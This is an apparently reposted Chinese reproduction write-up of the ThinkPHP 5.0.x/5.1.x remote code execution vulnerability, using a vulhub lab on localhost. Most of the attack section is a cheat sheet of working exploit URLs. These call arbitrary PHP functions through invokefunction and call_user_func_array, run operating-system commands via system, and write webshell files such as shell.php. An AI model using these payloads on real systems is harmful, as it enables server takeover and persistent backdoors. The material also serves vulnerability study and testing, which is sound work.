z1挂东南
z1挂东南

ThinkPHP——ThinkPHP 5.x远程代码执行

0x00目录

  • 漏洞简介
  • 影响版本
  • 复现前提
  • 复现环境
  • 复现过程
  • 总结
  • 参考链接

0x01漏洞简介

ThinkPHP 5.x版本存在远程代码执行漏洞,高危,可被getshell。

0x02 影响版本

5.0.x版本:5.0.8~5.0.23
5.1.x版本:5.1.29(本次使用5.1.0版本也复现成功)

0x03 复现前提

5.0.8~5.0.12版本不需要开启debug模式
5.0.13~5.0.23复现前要保证开启了debug模式(默认是关闭的)

0x04 复现环境

5.0.x环境使用5.0.22版本,环境使用docker进行搭建。
环境地址:https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce

5.1.x环境使用5.1.0版本。
环境源码下载地址:https://www.php.cn/xiazai/code/4475

0x05 复现过程

5.0.22版本:
payload:http://127.0.0.1/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
截图:

5.1.0版本:
payload:http://127.0.0.1/ThinkPHP5.1.0/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
截图:

0x06 总结

5.0.x PHP版本>=5.4

//payload:
http://127.0.0.1/index.php/?s=index/\\think\\template\driver\\file/write&cacheFile=zxc0.php&content=

http://127.0.0.1/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=

http://127.0.0.1/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'\'>zxc2.php

http://127.0.0.1/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://127.0.0.1/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

5.1.x PHP版本>5.5

//payload:
http://127.0.0.1/index.php?s=index/think\request/input?data[]=phpinfo()&filter=assert

http://127.0.0.1/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

//写入文件
http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=

http://127.0.0.1/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1

http://127.0.0.1/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=操作系统命令

http://127.0.0.1/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

http://127.0.0.1/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

http://127.0.0.1/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令

http://127.0.0.1/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

0x07 参考链接

1.thinkphp 5.x全版本任意代码执行分析全记录
2.ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
3.thinkphp5.0和5.1 rce poc总结
4.ThinkPHP 5.0 * 远程代码执行漏洞简略分析

你可能感兴趣的:(ThinkPHP——ThinkPHP 5.x远程代码执行)

  • 老程序员的感慨 workflower 讲闲话人工智能
    三十年前,我第一次在绿底黑字的终端机上看到'HelloWorld'闪烁时,心跳得比收到情书还快。那些年我们用十六进制与机器对话,在堆栈溢出前背诵内存地址,把咖啡渍滴落在泛黄的《算法导论》扉页上。记得为优化三行汇编代码熬到晨光熹微,机房空调的嗡鸣里,年轻的眼睛亮得能烧穿夜幕。如今IDE自动补全了所有思念,云服务吞噬了服务器轰鸣的心跳。抽屉深处藏着VB6的光盘、Delphi的破解狗,还有那本被翻烂的T
  • Python GIL(全局解释器锁)深度解析及其对多线程程序的影响 清水白石008 pythonPython题库开源软件pythonjava数据库
    PythonGIL(全局解释器锁)深度解析及其对多线程程序的影响在Python编程世界中,GIL(全局解释器锁)是一个不可忽视的概念,尤其在涉及多线程编程时。GIL的存在对Python的多线程性能有着深远的影响,了解其工作原理和影响是写出高效Python多线程代码的关键。本文将深入剖析GIL的工作原理,探讨其对多线程程序的影响,并给出实用的编程建议。一、GIL是什么?GIL,全称GlobalInt
  • 缓存的几种不同的实现方法? ducode
    一、1、文件缓存所谓文件缓存,就是根据逻辑判断,一段时间内某个asp的特定执行将不会很大的变动,因因而将内容以静态html的形式存放,然后以web的重定向技术让客户端访问静态文件,以达到减少CPU、数据库资源等的需求。这样的应用很多,譬如很多论坛就是在回复帖子的时候将整个帖子重新生成一个静态文件,然后进行重定向的,例如DONEWS,COM的论坛。该成静态还有一个副作用(好处)可以很容易被googl
  • 3款 .NET 开源的编辑器,包含代码、文本和Markdown编辑功能! 追逐时光者 C#.NET开源项目.net编辑器c#微软技术
    前言今天大姚给大家推荐3款.NET开源、免费的编辑器,其中包含C#代码编辑器、文本编辑器和Markdown编辑器!RoslynPadRoslynPad是一个基于Roslyn和AvalonEdit开源、轻量、跨平台的C#编辑器。开源地址:https://github.com/roslynpad/roslynpad详细介绍:一个基于Roslyn和AvalonEdit的跨平台C#编辑器NotepadsN
  • (持续更新中~~)3、原来可以这样理解C语言_分⽀和循环上(3)条件操作符 do_you_want_ C语言逐步拆解c语言算法数据结构
    目录3.条件操作符3.条件操作符条件操作符也叫三⽬操作符,需要接受三个操作数的,形式如下:exp1?exp2:exp3条件操作符的计算逻辑是:如果exp1为真,exp2计算,计算的结果是整个表达式的结果;如果exp1为假,exp3计算,计算的结果是整个表达式的结果。练习1:使⽤条件操作符表⽰下⾯代码的逻辑#includeintmain(){inta=0;intb=0;scanf("%d",&a);
  • Java @Value注解的用处 打破砂锅问到底007 Javajavaspring开发语言
    1.是什么1.1)概念@Value注解是Spring的注解,可以用来将外部的值动态注入到Bean中,在@Value注解中,可以使用${}或#{}。${}与#{}的区别如下:(1)@Value("${}"):可以获取对应属性文件中定义的属性值。(2)@Value("#{}"):表示SpEl表达式通常用来获取bean的属性,或者调用bean的某个方法。1.2)@Value注解用法小结:#{…}用于执行
  • 情人节用js写一个爱心代码 金刚廉神兽 javascript前端htmlhtml5开发语言
    情人节快乐!你可以用JavaScript写一个简单的爱心代码。以下是一个示例代码,使用HTML5canvas绘制一个爱心图形:LoveHeartvarcanvas=document.getElementById("loveHeart");varctx=canvas.getCon
  • [JavaWeb]搜索表单区域 亓才孓 csscss3前端javaweb
    一.注意事项设置外边距:margin:(参数可省去部分)上下左右二.源代码Tlias智能学习辅助系统/*导航栏样式*/.navbar{background-color:#b5b3b3;/*灰色背景*/display:flex;/*flex弹性布局*/justify-content:space-between;/*左右对齐*/padding:10px;/*内边距*/align-items:cente
  • Vue.js 组件开发:从基础到进阶 学不完了是吧 Vuevue.js
    Vue.js是一个渐进式的JavaScript框架,其核心理念之一就是基于组件的开发。组件可以极大地提高代码的复用性、可维护性和可测试性。本篇文章将从基础到进阶,带你了解Vue.js的组件开发方法和最佳实践。什么是组件?在Vue.js中,组件是一个具有独立功能的可复用模块。组件可以包含HTML模板、CSS样式和JavaScript逻辑。通过组件化开发,可以将复杂的页面分解为多个易于管理的部分。组件
  • MySQL数据库连接串 学不完了是吧 数据库mysql
    数据库连接串(通常称为连接字符串)包含了连接到数据库所需的所有信息,如数据库类型、服务器地址、端口、数据库名称、用户名和密码等。获取数据库连接串的方法取决于你使用的数据库类型和环境。以下是一些常见数据库的示例:MySQL如果你使用的是MySQL数据库,连接串通常如下:arduino复制代码jdbc:mysql://:/?user=&password=其中:复制代码*``是数据库服务器的地址。*``
  • w184校园网上店铺的设计与实现 栗豆包 javaspringboot后端javaspringtomcat
    作者简介:多年一线开发工作经验,原创团队,分享技术代码帮助学生学习,独立完成自己的网站项目。代码可以查看文章末尾⬇️联系方式获取,记得注明来意哦~赠送计算机毕业设计600个选题excel文件,帮助大学选题。赠送开题报告模板,帮助书写开题报告。作者完整代码目录供你选择:《Springboot网站项目》400套《ssm网站项目》800套《小程序项目》300套《App项目》500套《Python网站项目
  • 【项目集成Husky】 软件205 在线工具箱(毕设)vue
    项目集成Husky安装初始化Husky在.husky→pre-commit文件中添加想要执行的命令安装使用Husky可以帮助你在Git钩子中运行脚本,例如在提交代码前运行测试或格式化代码pnpmadd--save-devhusky初始化Huskynpxhuskyinit这会在项目根目录下创建一个.husky目录在.husky→pre-commit文件中添加想要执行的命令pnpmrunformat官
  • 盘点JavaScript中所有声明变量的方式及特性 李游Leo 前端编程语言ECMAScriptjavascript开发语言ecmascript
    在JavaScript中,变量的定义是编程的基础,而JavaScript提供了多种灵活的方式来定义变量。本文将详细盘点JavaScript中所有变量定义的方式,包括传统的var、let、const,以及通过this、window、top等对象定义变量的方式,并结合代码示例进行说明。一、传统变量定义方式var语法:varvariable_name[=initial_value];特性:函数作用域或全
  • this、self、window、top 在 JavaScript 中的区别深入研究 李游Leo ECMAScript编程语言前端javascript开发语言ecmascript
    在JavaScript开发中,this、self、window、top是四个常用的概念,它们在不同的上下文中有着不同的用途和含义。理解它们的区别对于编写健壮的JavaScript代码至关重要。本文将详细解释这四个概念的区别,并通过代码示例进行验证。一、this的含义与用法基础概念this是一个关键字,它在JavaScript中指向当前执行上下文的对象。this的值取决于函数的调用方式。例如,在全局
  • JavaScript电子网页时钟效果(canvas版) 李游Leo 前端javascriptecmascript前端
    先上代码:分部翻页电子时钟body{display:flex;justify-content:center;align-items:center;height:100vh;background-color:#333;margin:0;}canvas{background-color:#000;border:5pxsolid#555;}constcanvas=document.getElementB
  • CSS特效 —— 蛇形左右扭动的效果 DTcode7 HTML网站开发#前端基础入门三大核心之CSSHTMLCSSwebcss3网页开发
    CSS特效——蛇形左右扭动的效果引言基础概念示例一:基本的蛇形动画HTML结构CSS样式代码解释示例二:增加动画的复杂度CSS样式代码解释示例三:多条蛇形元素HTML结构CSS样式代码解释示例四:改变蛇形元素的形状CSS样式代码解释示例五:加入碰撞效果CSS样式代码解释功能使用思路思路一:控制动画的重复次数思路二:调整动画方向思路三:使用JavaScript控制动画实际开发中的使用技巧自行拓展内容
  • html、js、css实现爱心效果 学不完了是吧 HTMLcsscss3前端
    好的!我们可以进一步美化这个爱心效果,增加更多动态和视觉吸引力。以下是改进后的代码,包括以下功能:1.背景渐变:添加动态背景渐变效果。2.爱心阴影:为爱心添加阴影,使其更具立体感。3.随机颜色:点击时随机切换颜色,而不是固定顺序。4.文字提示:在爱心下方添加文字提示,告诉用户可以点击切换颜色。---###美化后的代码```html跳动爱心body{display:flex;justify-cont
  • 基于Pyhton的人脸识别(Python 3.12+face_recognition库) F2022697486 python人工智能开发语言
    使用Python进行人脸编码和比较简介在这个教程中,我们将学习如何使用Python和face_recognition库来加载图像、提取人脸编码,并比较两个人脸是否相似。face_recognition库是一个强大的工具,它基于dlib的深度学习模型,可以轻松实现人脸检测和识别功能。本教程适合初学者,我们将通过一个简单的项目来了解这个库的基本用法和环境配置。代码示例importface_recogn
  • 【排序算法】希尔排序(C语言) 手眼通天王水水 #查找排序算法排序算法c语言算法
    【排序算法】——希尔排序目录一、希尔排序原理1.插入排序的问题2.希尔排序的思路二、希尔排序的相关问题1.为什么插入排序那么多但效率却很高2.如何选择希尔增量三、代码实现1.代码实现思路2.实现代码希尔排序是对直接插入排序的优化,在学习之前,没有学过插入排序的童鞋们建议先学习插入排序:点击跳转到插入排序一、希尔排序原理1.插入排序的问题逆序有序的数组排序时,时间复杂度为O(n2)O(n^2)O(n
  • MyBatis概述——一个优秀的持久层框架 AI天才研究院 Python实战自然语言处理人工智能语言模型编程实践开发语言架构设计
    作者:禅与计算机程序设计艺术1.简介MyBatis是一款开源的持久层框架,它支持定制化SQL、存储过程以及高级映射。MyBatis避免了几乎所有的JDBC代码和参数处理,将XML配置化结果映射成Java对象并通过接口形式传入到业务层,使得开发人员更关注于业务逻辑而不是数据库相关的事务控制和重复代码等低级事务性工作。MyBatis的定位就是将Java对象和关系数据库的数据对接起来,做到自动化crud
  • AI协助探索AI新构型的自动化创新概念 liron71 人工智能
    训练AI自生成输出模块化代码,生成元代码级别的AI功能单元代码,然后再由AI组织为另一个AI,实现AI开发AI的能力;用AI协助探索迭代新构型AI将会出现,并成为一种新的技术路线潮流。有限结点,无限的连接形式,也是实现一种复杂性的方式。扩展结点、增加参数,是另一种外延式的实现复杂性的方式,这种方式,也可以看作是有限结点、动态连接形式,是等效的,当连接权重置值0,就相当于连接消除,连接构型中相当于没
  • Oracle PL/SQL 编程入门:第十六章 记录类型 Records caifox菜狐狸 OraclePL/SQL编程入门oraclesql数据库PL/SQLRecordRecords记录
    欢迎来到OraclePL/SQL编程入门的第十六章!在这一章中,我们将深入探讨记录类型(Records)。通过学习基于表和游标的记录、用户自定义记录、记录的兼容性、嵌套记录以及集合记录的定义和使用方法,你将能够编写更加灵活和高效的数据库操作代码。此外,我们还会介绍一些注意事项,并通过实际例子展示它们的用法。准备好迎接新的挑战了吗?让我们开始吧!第一节:记录类型Record记录类型(Record)是
  • Spring框架AOP基本使用指南 未来并未来 springjava后端
    AOP(Aspect-OrientedProgramming,面向切面编程)是Spring框架中的一个重要特性,它允许开发者将横切关注点(如日志记录、事务管理、安全性等)从业务逻辑中分离出来,从而提高代码的模块化和可维护性。本文将详细介绍Spring框架中AOP的基本使用,包括如何定义切面、通知、切点以及如何在Spring应用中配置AOP。1.AOP基本概念在开始使用SpringAOP之前,我们需
  • AIGC时代的Vue或React前端开发 GISer_Jinger JavascriptReactVueAIGCvue.jsreact.js
    在AIGC(人工智能生成内容)时代,Vue开发正经历着深刻的变革。以下是对AIGC时代Vue开发的详细分析:一、AIGC技术对Vue开发的影响代码生成与自动化AIGC技术使得开发者能够借助智能工具快速生成和优化Vue代码。例如,通过自然语言处理模型(如ChatGPT),开发者可以描述组件的功能和样式需求,然后自动生成包含模板、脚本和样式的完整组件代码。这不仅大大提高了开发效率,还减少了人为错误的可
  • 通过反射搭建简易的Servlet层自动化映射参数并调用Service层业务方法的框架 未来并未来 servlet自动化运维
    在现代JavaWeb开发中,Servlet作为处理HTTP请求的核心组件,通常需要手动解析请求参数并调用相应的Service层方法。这种方式虽然直观,但随着业务逻辑的复杂化,代码量会迅速增加,维护成本也随之上升。为了提高开发效率,我们可以通过反射机制搭建一个简易的框架,实现Servlet层参数的自动化映射和Service层方法的自动调用。1.框架设计思路我们的目标是实现以下功能:自动化参数映射:将
  • C语言基础5 四代目 水门 嵌入式面试c语言开发语言
    关系运算符与逻辑运算符的优先级“!”逻辑非运算符优先级高于、>=、==关系运算符优先级高于“&&”逻辑与运算符和“||”逻辑或运算符函数的作用1、提高代码复用性:通过封装重复使用的代码块,函数允许在不同地方调用同一代码,避免重复编写相同或相似的代码。2、增强代码可读性:通过将相关逻辑分组,函数使代码结构更加清晰,易于理解。3、提高代码维护性:修改函数的行为只需在一个地方进行,而不是多个地方,从而简
  • 什么是“脚本语言” 暮雨澪 脚本语言
    一、脚本脚本语言又被称为扩建的语言,或者动态语言,是一种编程语言,用来控制软件应用程序,脚本通常是以文本(ASCⅡ)保存,只是在被调用时进行解释或者编译。当执行脚本时,计算机会执行一连串的操作。这些操作可能只涉及Illustrator,也可能涉及其他应用程序,如文字处理、电子表格和数据管理程序。Illustrator可支持多种脚本环境(例如,MicrosoftVisualBasic、AppleSc
  • WSL开发环境配置(linux + python + nodejs + docker) Lilixxs 环境搭建基础设施linux运维服务器
    配置要求及目标总体目标:完整的Linux开发环境可开发基于node.js的前端程序可开发基于python的后端程序(仅日常程序,不包含机器学习程序)可运行docker容器,用于快速搭建测试环境Linux环境要求支持centos发行版类似的操作方式和指令(如使用rpm、dnf进行软件包管理)登录用户具有root权限(执行高权限命令,输入sudo即可执行)可从国内源更新软件基本优化:内核指令优化、禁用
  • 构建一个智能客服Agent:提升服务效率的实践 人工智能机器学习
    在上一篇文章中,我们讨论了如何构建一个代码助手Agent。今天,我想分享另一个实际项目:如何构建一个智能客服Agent。这个项目源于我们一个电商客户的真实需求-提升客服效率,降低人工成本。从客户需求说起记得第一次和客户沟通时的场景:客户:我们每天要处理上万条客服请求,人工成本太高了我:主要是哪些类型的请求?客户:订单查询、退换货、商品咨询这些,很多都是重复性的工作我:这些场景很适合用AIAgent
  • 微信小程序-绘制仪表盘 学习者+1 微信小程序微信小程序小程序
    参考文章1、微信小程序Canvas自绘图表之仪表图(表盘)2、canvas实现环形渐变进度条效果展示前言完整代码可移至参考文章1,若有需要,敬请移步。在此根据需要对样式进行了些修改,在此仅记录绘制表盘的代码。代码functiondrawCircle(item,that){//定义画图大小letwidth=windowWidth*0.6;letheight=windowWidth*0.6;//获取中
  • 关于旗正规则引擎中的MD5加密问题 何必如此 jspMD5规则加密
    一般情况下,为了防止个人隐私的泄露,我们都会对用户登录密码进行加密,使数据库相应字段保存的是加密后的字符串,而非原始密码。 在旗正规则引擎中,通过外部调用,可以实现MD5的加密,具体步骤如下: 1.在对象库中选择外部调用,选择“com.flagleader.util.MD5”,在子选项中选择“com.flagleader.util.MD5.getMD5ofStr({arg1})”; 2.在规
  • 【Spark101】Scala Promise/Future在Spark中的应用 bit1129 Promise
    Promise和Future是Scala用于异步调用并实现结果汇集的并发原语,Scala的Future同JUC里面的Future接口含义相同,Promise理解起来就有些绕。等有时间了再仔细的研究下Promise和Future的语义以及应用场景,具体参见Scala在线文档:http://docs.scala-lang.org/sips/completed/futures-promises.html
  • spark sql 访问hive数据的配置详解 daizj spark sqlhivethriftserver
    spark sql 能够通过thriftserver 访问hive数据,默认spark编译的版本是不支持访问hive,因为hive依赖比较多,因此打的包中不包含hive和thriftserver,因此需要自己下载源码进行编译,将hive,thriftserver打包进去才能够访问,详细配置步骤如下:   1、下载源码   2、下载Maven,并配置 此配置简单,就略过
  • HTTP 协议通信 周凡杨 javahttpclienthttp通信
                            一:简介  HTTPCLIENT,通过JAVA基于HTTP协议进行点与点间的通信!     二: 代码举例      测试类: import java
  • java unix时间戳转换 g21121 java
    把java时间戳转换成unix时间戳: Timestamp appointTime=Timestamp.valueOf(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date())) SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd hh:m
  • web报表工具FineReport常用函数的用法总结(报表函数) 老A不折腾 web报表finereport总结
    说明:本次总结中,凡是以tableName或viewName作为参数因子的。函数在调用的时候均按照先从私有数据源中查找,然后再从公有数据源中查找的顺序。   CLASS CLASS(object):返回object对象的所属的类。   CNMONEY CNMONEY(number,unit)返回人民币大写。 number:需要转换的数值型的数。 unit:单位,
  • java jni调用c++ 代码 报错 墙头上一根草 javaC++jni
    # # A fatal error has been detected by the Java Runtime Environment: # #  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00000000777c3290, pid=5632, tid=6656 # # JRE version: Java(TM) SE Ru
  • Spring中事件处理de小技巧 aijuans springSpring 教程Spring 实例Spring 入门Spring3
    Spring 中提供一些Aware相关de接口,BeanFactoryAware、 ApplicationContextAware、ResourceLoaderAware、ServletContextAware等等,其中最常用到de匙ApplicationContextAware.实现ApplicationContextAwaredeBean,在Bean被初始后,将会被注入 Applicati
  • linux shell ls脚本样例 annan211 linuxlinux ls源码linux 源码
    #! /bin/sh - #查找输入文件的路径 #在查找路径下寻找一个或多个原始文件或文件模式 # 查找路径由特定的环境变量所定义 #标准输出所产生的结果 通常是查找路径下找到的每个文件的第一个实体的完整路径 # 或是filename :not found 的标准错误输出。 #如果文件没有找到 则退出码为0 #否则 即为找不到的文件个数 #语法 pathfind [--
  • List,Set,Map遍历方式 (收集的资源,值得看一下) 百合不是茶 listsetMap遍历方式
    List特点:元素有放入顺序,元素可重复 Map特点:元素按键值对存储,无放入顺序 Set特点:元素无放入顺序,元素不可重复(注意:元素虽然无放入顺序,但是元素在set中的位置是有该元素的HashCode决定的,其位置其实是固定的) List接口有三个实现类:LinkedList,ArrayList,Vector LinkedList:底层基于链表实现,链表内存是散乱的,每一个元素存储本身
  • 解决SimpleDateFormat的线程不安全问题的方法 bijian1013 javathread线程安全
    在Java项目中,我们通常会自己写一个DateUtil类,处理日期和字符串的转换,如下所示: public class DateUtil01 { private SimpleDateFormat dateformat = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); public void format(Date d
  • http请求测试实例(采用fastjson解析) bijian1013 http测试
            在实际开发中,我们经常会去做http请求的开发,下面则是如何请求的单元测试小实例,仅供参考。 import java.util.HashMap; import java.util.Map; import org.apache.commons.httpclient.HttpClient; import
  • 【RPC框架Hessian三】Hessian 异常处理 bit1129 hessian
    RPC异常处理概述   RPC异常处理指是,当客户端调用远端的服务,如果服务执行过程中发生异常,这个异常能否序列到客户端?   如果服务在执行过程中可能发生异常,那么在服务接口的声明中,就该声明该接口可能抛出的异常。   在Hessian中,服务器端发生异常,可以将异常信息从服务器端序列化到客户端,因为Exception本身是实现了Serializable的
  • 【日志分析】日志分析工具 bit1129 日志分析
    1. 网站日志实时分析工具 GoAccess http://www.vpsee.com/2014/02/a-real-time-web-log-analyzer-goaccess/ 2. 通过日志监控并收集 Java 应用程序性能数据(Perf4J) http://www.ibm.com/developerworks/cn/java/j-lo-logforperf/ 3.log.io 和
  • nginx优化加强战斗力及遇到的坑解决 ronin47 nginx 优化
       先说遇到个坑,第一个是负载问题,这个问题与架构有关,由于我设计架构多了两层,结果导致会话负载只转向一个。解决这样的问题思路有两个:一是改变负载策略,二是更改架构设计。    由于采用动静分离部署,而nginx又设计了静态,结果客户端去读nginx静态,访问量上来,页面加载很慢。解决:二者留其一。最好是保留apache服务器。      来以下优化:      
  • java-50-输入两棵二叉树A和B,判断树B是不是A的子结构 bylijinnan java
    思路来自: http://zhedahht.blog.163.com/blog/static/25411174201011445550396/ import ljn.help.*; public class HasSubtree { /**Q50. * 输入两棵二叉树A和B,判断树B是不是A的子结构。 例如,下图中的两棵树A和B,由于A中有一部分子树的结构和B是一
  • mongoDB 备份与恢复 开窍的石头 mongDB备份与恢复
    Mongodb导出与导入 1: 导入/导出可以操作的是本地的mongodb服务器,也可以是远程的. 所以,都有如下通用选项: -h host   主机 --port port    端口 -u username 用户名 -p passwd   密码 2: mongoexport 导出json格式的文件
  • [网络与通讯]椭圆轨道计算的一些问题 comsci 网络
         如果按照中国古代农历的历法,现在应该是某个季节的开始,但是由于农历历法是3000年前的天文观测数据,如果按照现在的天文学记录来进行修正的话,这个季节已经过去一段时间了。。。。。       也就是说,还要再等3000年。才有机会了,太阳系的行星的椭圆轨道受到外来天体的干扰,轨道次序发生了变
  • 软件专利如何申请 cuiyadll 软件专利申请
    软件技术可以申请软件著作权以保护软件源代码,也可以申请发明专利以保护软件流程中的步骤执行方式。专利保护的是软件解决问题的思想,而软件著作权保护的是软件代码(即软件思想的表达形式)。例如,离线传送文件,那发明专利保护是如何实现离线传送文件。基于相同的软件思想,但实现离线传送的程序代码有千千万万种,每种代码都可以享有各自的软件著作权。申请一个软件发明专利的代理费大概需要5000-8000申请发明专利可
  • Android学习笔记 darrenzhu android
    1.启动一个AVD 2.命令行运行adb shell可连接到AVD,这也就是命令行客户端 3.如何启动一个程序   am start -n package name/.activityName   am start -n com.example.helloworld/.MainActivity 启动Android设置工具的命令如下所示: # am start -
  • apache虚拟机配置,本地多域名访问本地网站 dcj3sjt126com apache
    现在假定你有两个目录,一个存在于 /htdocs/a,另一个存在于 /htdocs/b 。 现在你想要在本地测试的时候访问 www.freeman.com 对应的目录是 /xampp/htdocs/freeman ,访问 www.duchengjiu.com 对应的目录是 /htdocs/duchengjiu。 1、首先修改C盘WINDOWS\system32\drivers\etc目录下的
  • yii2 restful web服务[速率限制] dcj3sjt126com PHPyii2
    速率限制 为防止滥用,你应该考虑增加速率限制到您的API。 例如,您可以限制每个用户的API的使用是在10分钟内最多100次的API调用。 如果一个用户同一个时间段内太多的请求被接收, 将返回响应状态代码 429 (这意味着过多的请求)。 要启用速率限制, [[yii\web\User::identityClass|user identity class]] 应该实现 [[yii\filter
  • Hadoop2.5.2安装——单机模式 eksliang hadoophadoop单机部署
    转载请出自出处:http://eksliang.iteye.com/blog/2185414 一、概述        Hadoop有三种模式 单机模式、伪分布模式和完全分布模式,这里先简单介绍单机模式 ,默认情况下,Hadoop被配置成一个非分布式模式,独立运行JAVA进程,适合开始做调试工作。   二、下载地址 Hadoop 网址http:
  • LoadMoreListView+SwipeRefreshLayout(分页下拉)基本结构 gundumw100 android
    一切为了快速迭代 import java.util.ArrayList; import org.json.JSONObject; import android.animation.ObjectAnimator; import android.os.Bundle; import android.support.v4.widget.SwipeRefreshLayo
  • 三道简单的前端HTML/CSS题目 ini htmlWeb前端css题目
    使用CSS为多个网页进行相同风格的布局和外观设置时,为了方便对这些网页进行修改,最好使用( )。http://hovertree.com/shortanswer/bjae/7bd72acca3206862.htm   在HTML中加入<table style=”color:red; font-size:10pt”>,此为( )。http://hovertree.com/s
  • overrided方法编译错误 kane_xie override
    问题描述: 在实现类中的某一或某几个Override方法发生编译错误如下: Name clash: The method put(String) of type XXXServiceImpl has the same erasure as put(String) of type XXXService but does not override it   当去掉@Over
  • Java中使用代理IP获取网址内容(防IP被封,做数据爬虫) mcj8089 免费代理IP代理IP数据爬虫JAVA设置代理IP爬虫封IP
    推荐两个代理IP网站:   1. 全网代理IP:http://proxy.goubanjia.com/   2. 敲代码免费IP:http://ip.qiaodm.com/   Java语言有两种方式使用代理IP访问网址并获取内容,   方式一,设置System系统属性   // 设置代理IP System.getProper
  • Nodejs Express 报错之 listen EADDRINUSE qiaolevip 每天进步一点点学习永无止境nodejs纵观千象
    当你启动 nodejs服务报错: >node app Express server listening on port 80 events.js:85 throw er; // Unhandled 'error' event ^ Error: listen EADDRINUSE at exports._errnoException (
  • C++中三种new的用法 _荆棘鸟_ C++new
    转载自:http://news.ccidnet.com/art/32855/20100713/2114025_1.html 作者: mt 其一是new operator,也叫new表达式;其二是operator new,也叫new操作符。这两个英文名称起的也太绝了,很容易搞混,那就记中文名称吧。new表达式比较常见,也最常用,例如: string* ps = new string("
  • Ruby深入研究笔记1 wudixiaotie Ruby
    module是可以定义private方法的 module MTest def aaa puts "aaa" private_method end private def private_method puts "this is private_method" end end
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他